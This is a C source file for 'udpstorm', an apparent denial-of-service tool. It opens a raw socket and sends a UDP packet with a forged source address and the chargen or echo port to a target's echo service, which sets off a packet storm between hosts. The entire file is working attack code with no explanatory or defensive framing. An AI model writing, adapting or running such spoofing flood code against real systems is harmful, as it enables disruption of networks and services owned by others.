#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <getopt.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <linux/ip.h>
#include <linux/icmp.h>

#include "resolve.h"
#include "udpstorm.h"

#define ECHO_MESSAGE_LEN	16
#define BUF			sizeof(struct udpdgramhdr) + ECHO_MESSAGE_LEN


int main(int argc, char *argv[])
{
	struct sockaddr_in to;
	char buf[BUF];
	struct udpdgramhdr *udpdgram = (struct udpdgramhdr *)buf;
	struct iphdr *ip = &udpdgram->ip;
	struct udphdr *udp = &udpdgram->udp;
	int ch, raw_socket;
	ulong host;
	uint tot_len = sizeof(struct udphdr);

	udp->source = 0;

	while ((ch = getopt(argc, argv, "ce")) != EOF)
		switch ((char)ch) {
			case 'c':
				if (udp->source) {
					printf("-c option not compatable\n");
					exit(1);
				}
				udp->source = htons(19);
				break;
			case 'e':
				if (udp->source) {
					printf("-e option not compatable\n");
					exit(1);
				}
				udp->source = htons(IPPORT_ECHO);
				tot_len += ECHO_MESSAGE_LEN;
				break;
		}

	argv += optind;
	argc -= optind;

	if (!argc || argc > 2 || !udp->source) {
		printf(
			"usage: udpstorm "
			"-c|-e "
			"hostA [hostB] "
			"\n"
		);
		exit(1);
	}

	raw_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	if (raw_socket < 0) {
		perror("socket");
		exit(1);
	}

	host = resolve(argv[0]);

	udp->dest = htons(IPPORT_ECHO);
	udp->len = htons(tot_len);

	tot_len += sizeof(struct iphdr);

	ip->ihl = (sizeof(struct iphdr) >> 2);
	ip->version = 4;
	ip->tos = 0;
	ip->tot_len = htons(tot_len);
	ip->protocol = IPPROTO_UDP;
	ip->ttl = 64;
	ip->frag_off = 0;
	ip->id = htons(1);
	ip->daddr = host;

	if (argc == 2)
		ip->saddr = resolve(argv[1]);
	else
		ip->saddr = host;

	to.sin_family = AF_INET;
	to.sin_port = htons(IPPORT_ECHO);
	to.sin_addr.s_addr = host;

	if (sendto(raw_socket, udpdgram, tot_len, 0, (struct sockaddr *)&to, sizeof(to)) != tot_len) {
		perror("sendto");
		exit(1);
	}

	close(raw_socket);

	return 0;
}
